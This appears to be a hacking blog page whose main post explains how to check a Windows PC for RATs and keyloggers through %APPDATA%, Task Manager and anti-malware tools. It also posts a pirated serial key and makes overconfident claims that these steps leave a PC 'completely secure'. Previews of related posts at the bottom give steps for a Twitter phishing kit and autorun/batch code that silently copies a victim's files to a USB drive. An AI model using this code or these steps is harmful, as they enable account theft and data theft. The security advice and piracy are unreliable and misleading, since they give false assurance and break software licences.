Skip to main content

How to Identify whether you are RATTED OR KEYLOGGED

Hello friends
Here , i will help you in another way.Today , i will write an in-depth tutorial on how to know whether you are ratted or keylogged by some noobs or hackers.I am here to safeguard you all Smiling

For all the noobs out here who don’t know what a keylogger is ,
Its a tool that logs whatever you type and hence,steal your passwords.

For all the noobs,again , i will tell what a RAT is too ! Its called Remote Administration Tool. The name speaks for itself.They can fuck up your computers like u won't understand So beware !

And all you that thinks “I have full version of one of the best antivirus ..I am completely safe !”..Its a myth..

First of all ,let me tell you something, CMD is the master of your pc … So im beginning my tutorial Smiling

PHASE ONE

Open up Cmd by hitting run and typing in cmd.
And type in this : cd %APPDATA%
If you see something like the list below,its ok.
    ArbiBots.ini
    RSBot_Accounts.ini
    RSBot Accounts.ini
    wklnhst.dat
    Adobe ILLExports Filter CS5 Prefs
    Adobe PNG Format CS5 Prefs


But if these are shown up ,you are so in danger !

    yourpcname.dat
    SQlite3.dll
    svchost.exe (Possibly)
    ArbiAuth.ini
    GHSettings.ini
    wklnhst.dat


So this will pretty much tell whether your pc is secure or not !

You can also hit run and type %appdata% and delete any suspicious files that you see.This is the location where most of the common viruses are found.
So Phase 1 is complete Smiling

Now just download a Registry Cleaner and clean your messed up registry and restart your system.You are free of viruses!

PHASE 2

Now before we begin,let me tell ,task manager is like a keyhole to your entire system showing everything happening in it .You can detect many RATS using the Task Manager.
Hit processes on Task Manager and try to find any suspicious files.If you see some svchost.exe that eats so much of your resource,it may be a remote server.BUT DONT STOP THE PROCESS ! It may be some vital system process too! So right click and hit ‘Open File Location’ and use something like WireShark to grab its IP.If you find it suspicious,just terminate it Smiling

Ok..Phase 2 is over.You have got rid of RATS !

PHASE 3

Now let me tell you something, no virus is Fully undetactable ! Yes ! Even if you are the most skilled Crypter, it can always be detected.In my experience,i have found out that some day or the other,all viruses will be detected by your Antivirus.So do frequent Virus scans atleast once in a week to remove any viruses.
I will give you 3 tools that will help you fight against viruses.Don’t hesitate to download them.They are all awesome tools !
Malwarebytes Antimalware
Malwarebytes really help you detect many kind of harmful malware that lies in your PC. Especially if there is a detected server, then it can seek and destroy it. If you get the full version it’s always better.
Download :
LINK1                  LINK2                  LINK3

Microsoft Security Essentials

This is a free anti-virus software from Microsoft. It is easy to install and use.
Download : LINK
Comodo Firewall

With this you can monitor all your incoming and outgoing connections. So if there is a server connecting to it fu**ing mate, you know you are infected and need to follow crucial steps.
DOWNLOAD :LINK

Advance System Care Pro 5

Just use the ‘QuickCare’ button and let it scan. If you recently found many viruses and malwares, then there’s going to me many problems found on your registry. Just do a clean up using the software and your done.
Download : LINK
Serials :

Advanced SystemCare Pro 4.2.0
Serial : DFF7A-8204E-69ADE-0D5AA

Advanced SystemCare Pro 5.0
Serial : DFF7A-8204E-69ADE-0D5AA

Make sure you disconnect the internet before entering the serial for, v4.2.0 & v5.0.

Now you are completely free of viruses,Rats FUD crypted stuffs, Keyloggers and all other kinds of malwares. You PC is completely secure !

Comments

Popular posts from this blog

How to Hack a Twitter Account

Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing How to hack twitter accounts - Phishing First of all download:   Twitter fake login page ( Latest Version ) Click Here To Download : NOTE : You will be asked to enter a password while extracting the Documents. Please Insert the password as : IHA Step 1 First extract the contents into a folder Step 2 Then edit login.php .(right click and then select edit) In that ,find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com’ then change it to your destined URL but don’t forget ‘'. Now rename the script to pass.php and save it

How to steal data using your USB flash drive

Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose. This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice. Process is very simple as we have to add only 4-5 notepad files in the flash drive. Follow the following steps :- 1. Create a notepad file with name autorun.inf nad copy the following code. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat 2. Create another notepad file of name file.bat and copy the following code. @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”

How to use Keyloggers – Detailed Tutorial and FAQs

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc. WARNING: I highly recommend that you read this post completely since every single piece of information is important. I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go… 1. What is a Keylogger? A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. 2. How Keylogger works? Once the keylogger is installed on a PC, it starts operating in the backgrou